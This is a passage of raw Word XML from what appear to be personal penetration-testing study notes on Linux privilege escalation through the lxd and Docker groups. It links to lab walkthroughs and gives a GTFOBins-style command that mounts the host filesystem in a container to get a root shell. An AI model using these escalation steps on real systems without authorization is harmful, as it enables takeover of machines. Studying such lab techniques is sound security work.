      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The -n option in the echo command tells it not to output the trailing newline character that it normally adds at the end of its output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1319"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "secret" | sha256sum</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It actually hashes the string "secret\n" — the newline character (\n) is included in the input to sha256sum.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But when you run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="391"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -n "secret" | sha256sum</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It hashes exactly the string "secret", without a newline. This produces a different SHA-256 hash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E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19">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ku0oqky55w3w" w:id="255"/>
      <w:bookmarkEnd w:id="255"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lxd group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Being in the lxd group (similar to Docker) leads to root. Although the process is kind of long.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId629">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 ippsec video for HTB Tabby which explains the process at the end starting at like 44:00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId630">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://angelica.gitbook.io/hacktricks/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the hacktricks they used in the video, but they had to do some debugging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId631">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 Hacking Article that walks through how to do it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E21">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId632">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.hackingarticles.in/lxd-privilege-escalation/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E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24">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E25">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8p8t9kmi4jmt" w:id="256"/>
      <w:bookmarkEnd w:id="256"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E26">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E27">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"/usr/bin/docker" </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUDO Exploits</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section, we see how to abuse docker compose to add a root user to /etc/passwd and get root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E28">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rkptxgmbuouu" w:id="257"/>
      <w:bookmarkEnd w:id="257"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting Root from users in Docker Group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E29">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2349500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="466" name="image442.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image442.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId633"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2349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E2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another example where we saw Docker group was in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId634">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Peppo</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E2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First check what images we have available to us:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="687"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker image ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="687"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="812800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="281" name="image293.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image293.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63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1E30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="687"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see here, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">alpine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is not existent here so we can't just copy and paste the command from GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="687"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We have to replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">alpine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with one of the docker images we have (ex. redmine)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E32">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E33">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use the GTFObins command replacing the value &lt;alpine&gt; with one of the images listed above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run -v /:/mnt --rm -it redmine chroot /mnt sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E35">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E36">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we have root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E38">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E3B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId636">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pwned1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw that we were in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker group</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="584200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="465" name="image475.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image475.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63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E3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And since we are in the Docker group, that always means we can run the Docker binary. And usually, the only way to run the Docker binary is through the Docker Daemon, which runs as a root user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E3E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E3F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we are looking at binaries, we go to GTFO Bins, and specifically in the "Shell" section since we are trying to get a shell from Docker. We don't look at the SUID or SUDO section since we don't have either of those. And in the "Shell" section, it says that we can get a root shell from the command.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E40">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="806"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
